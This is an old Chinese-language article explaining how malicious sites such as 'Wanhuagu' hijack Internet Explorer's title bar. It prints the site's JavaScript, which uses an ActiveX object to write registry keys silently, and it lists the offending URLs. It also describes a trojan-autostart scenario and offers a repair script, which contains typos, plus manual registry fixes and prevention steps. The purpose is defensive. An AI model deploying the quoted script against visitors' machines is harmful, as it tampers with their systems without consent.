|
近來,屢屢發生網友在瀏覽網頁時,由于誤點擊一些網絡地址,造成在IE的瀏覽器的標題欄出現一些廣告信息,很是令人討厭!比如訪問已經大名鼎鼎的惡意網頁“萬花谷”,會將你的IE瀏覽器的標題欄顯示“歡迎來到萬花谷!請與OICQ:4040465聯系!”對于被惡意修改的IE標題欄該怎樣恢復呢?
一、IE標題欄被修改的原因
其實,該惡意網頁是含有有害代碼的ActiveX網頁文件,這些廣告信息的出現是因為瀏覽者的注冊表被惡意更改的結果,原因就是利用了下面這段JavaScript代碼修改了HKLM\SOFTWARE\Microsoft\InternetExplorer\Main\和HKCU\Software\Microsoft\Internet Explorer\Main\
中的Window Title的鍵值。看看下面的代碼你就會明白了:
<SCRIPT language=JavaScript>
document.write("<applet height=0 width=0 code=com.ms.activeX.ActiveXComponent> ");
function f(){ try {
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance(); Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance(); FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance(); Net = a1.GetObject(); try
{ if (document.cookie.indexOf("Chg") == -1) {
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", " 歡迎光臨http:/www.520cat.com");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", " .歡迎光臨http:/www.520cat.com");
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chgg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{} } function init() {
setTimeout("f()", 1000);
} init();
從上面不難看出它修改了你的注冊表!如果你認為沒有什么了不起,僅僅是修改了IE標題欄而已,那你可大錯特錯了!如果他將你注冊表改動將你IE指向一個木馬軟件的下載地址,木馬服務端軟件有只有幾K到幾十K大小的,下載這樣一個木馬只需幾秒!幾乎是一閃而過!然后木馬程序再將你的防火墻、殺毒軟件全部關閉!接著在注冊表HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run里加入木馬服務端自啟動程序,使之開機自動運行,這樣做是完全可能的!而結果是非常嚴重的!因此大家要十分小心嘍!
在系統默認狀態下,是由應用程序本身來提供標題欄的信息,但也允許用戶自行在上述注冊表項目中填加信息,而一些惡意的網站正是利用了這一點來得逞的:它們將串值Window Title下的鍵值改為其網站名或更多的廣告信息,從而達到改變瀏覽者IE標題欄的目的。不過在Windows 2000下,在注冊表
HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\和HKCU\Software\Microsoft\Internet Explorer\Main\
中沒有Window Title這個鍵值,所以這種惡意網頁對W2K是無法修改其標題欄的。
二、解決辦法
方法一:
(1)在Windows啟動后,點擊“開始”->“運行”菜單項,在“打開”欄中鍵入regedit,然后按“確定”鍵;
(2)展開注冊表到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分窗口中找到串值“Window Title” ,將該串值刪除即可,或將Window Title的鍵值改為“IE瀏覽器”也可以;
(3)同理,展開注冊表到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main,然后處理方法同(2)中所述。
(4)退出注冊表編輯器,重新啟動計算機,運行IE,你會發現困擾你的問題解決了!
方法二:復制如下代碼,存為文本文件,再改名為.htm文件,點擊運行,可以自動恢復IE標題欄。
<!-- Begin set start page and internet Explorer Window title-->
<SCRIPT language=JavaScript>
document.write("<applet height=0 width=0 code=com.ms.activeX.ActiveXComponent> ");
function f(){
try
{
<!--ActiveX初始化過程-->
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents .cookies.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer");
<!--檢測用戶注冊表并修改相應的鍵值為系統默認值“Microsoft Internet Explorer”-->
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
<!--實現打開頁面后1秒鐘內執行測試修改注冊表的工作-->
}
init();
</SCRIPT>
<!--End set start page and internet Explorer Window title-->
三、預防辦法:
1.要避免中招,關鍵是不要輕易去一些自己并不了解的站點,特別是那些看上去美麗誘人的網址更不要貿然前往,否則吃虧的往往是你。
2.由于該網頁是含有有害代碼的ActiveX網頁文件,因此在IE設置中將ActiveX插件和控件、Java腳本等全部禁止就可以避免中招。具體方法是:在IE窗口中點擊“工具->Internet選項,在彈出的對話框中選擇“安全”標簽,再點擊“自定義級別”按鈕,就會彈出“安全設置”對話框,把其中所有ActiveX插件和控件以及Java相關全部選擇“禁用”即可。在Win2k下把服務里面的遠程注冊表操作服務“Remote Registry Service”禁用就可以了。方法是點擊“管理工具->服務->Remote Registry Service(允許遠程注冊表操作),將這一項禁用。
3.對于所有用戶,可以通過升級到最新的KVW3000病毒庫,來預防該類惡意網頁的侵害(注意,必須是6月28日以后的病毒庫方可)。
四、目前已知這類網站名稱匯總
據我統計(所知)有如下網站可以修改瀏覽者的注冊表,甚至于是限制系統功能,使瀏覽者無法使用電腦!
1.http://on888.home.chinaren.com 這是大名鼎鼎的惡意網站“萬花谷”的網址;
2.http://www.findfeel.com/default.htm 這是和“萬花谷”同類型的惡意網站,破壞效果相同;
3.http://www.gohip.com 可以改變IE標題欄和收藏夾的討厭網站,沒有更嚴重的破壞功能;
4.http://www.520cat.com 修改瀏覽者的IE標題欄的網站。
當然,這樣的網站遠遠不止文中所提到的這幾個,它們的危害也各不相同,但只要你按本文中所說的預防方法去做,就不會有事了!
|
